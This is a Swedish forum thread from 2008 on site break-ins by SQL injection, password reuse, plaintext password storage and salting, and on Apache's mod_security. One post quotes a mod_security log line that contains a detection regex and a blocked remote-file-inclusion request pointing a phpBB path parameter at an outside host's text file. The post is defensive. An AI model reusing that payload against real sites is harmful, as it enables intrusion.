[Jimpsson]

Efterfesten hackades av en scriptkiddie var ingen über haxxor eller så. Killen använde sql injection och dumpade ut hela databasen, samma som gjorde detta hackade även basshunters konto på lunar för ett par dagar sen, det var med brute force tror jag.

Det verkar bli en väldigt stor hacker trend i år.

[guran]

Jag håller med Xamda. Om ni bara visste hur många företag som lagrar sina kunders lösenord i klartext så skulle ni förmodligen börja skriva klantskallar i sådan omfattning att ni skulle dö av trissdess på kuppen.

I princip spelar det ingen roll om lösenorden är krypterade eller inte i databasen om själva databasen är åtkomlig för fel personer. Jag kan bara hoppas på att de databaser jag har på olika webbhotell har sådan hög säkerhet att inga objudna gäster kommer åt dem. Men det är ju inget jag har kontroll över.

WN skulle kanske ha ett forum för säkerhet där vi kan diskutera det här och hjälpa varandra med säkerheten och utan att bli påhoppad som okunnig. Jag kan villigt erkänn att jag har ett par databaser som inte lever upp till tillräcklig säkerhet men jag jobbar med att höja den och tips vore inte så dumt.

Jag kan gissa att det finns ganska många medlemmar här på WN som just nu sitter och funderar på hur de ska implementera ett salt i deras redan färdiga och idrifttagna databaser. Ska de ändra andra lösenord och skicka mail till alla medlemmar och tala om att de måste ansöka om nya lösenord? Går det att salta lösenorden dynamiskt utan att medlemmarna märker något, eller? Frågorna är säkert många.

Massor av medlemmar på WN har inte heller de kunskaper som behövs för att själva skriva koden eller kanske inte ens förstår vad problemet överhuvud taget består av rent tekniskt.

[Danski]

Håller fullständigt med ovanstående guran att ett säkerhetsforum vore en bra idé, gärna endast för medlemmar också så man inte behöver spy ut sina problem till hela världen.

Och med tanke på om det går att salta utan användarna märker det. Det går att göra snabbt, lätt och smärtfritt =)

[DudeRille]

Citat:

Originally posted by Rokkan1@Jan 16 2008, 00:12
Efterfesten hackades av en scriptkiddie var ingen über haxxor eller så. Killen använde sql injection och dumpade ut hela databasen, samma som gjorde detta hackade även basshunters konto på lunar för ett par dagar sen, det var med brute force tror jag.

Det verkar bli en väldigt stor hacker trend i år.

Kan påpeka att lösenordet kom från efterfesten's databas till Basshunter's lunar..han hade samma lösen överallt.. dock rätt bra lösenord men duger inte när klantar som efterfesten inte kryptera det ens.

[Danielos]

Citat:

Originally posted by Nicklas@Jan 15 2008, 08:17
Vad bygger dessa sajter på, är det open source?
Det borde finnas en röd tråd i dessa hackade sajter som gör dem enklare att hacka.

Troligen inte, opensource är faktiskt ofta säkrare än hemmabygda sajter.

En sak som gör att många apache servrar är mkt lätta att hacka är att folk inte har vett nog att köra mod_security i apache.

Här är ett exempel från en logg med mod_security:

Citat:

mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp| dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [id "390144"] [rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"] [uri "/includes/functions.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt?"]

[Bladet]

Citat:

Ursprungligen postat av danielos

Citat:

Troligen inte, opensource är faktiskt ofta säkrare än hemmabygda sajter.

Jo, de flesta open source är ju ganska säkra om man bara ser till att patcha dem DIREKT en känd läcka hittas. Annars läcker ju de som soll.

Och jepp, mod_security fixar en hel del om man kodar dåligt ( = jag ).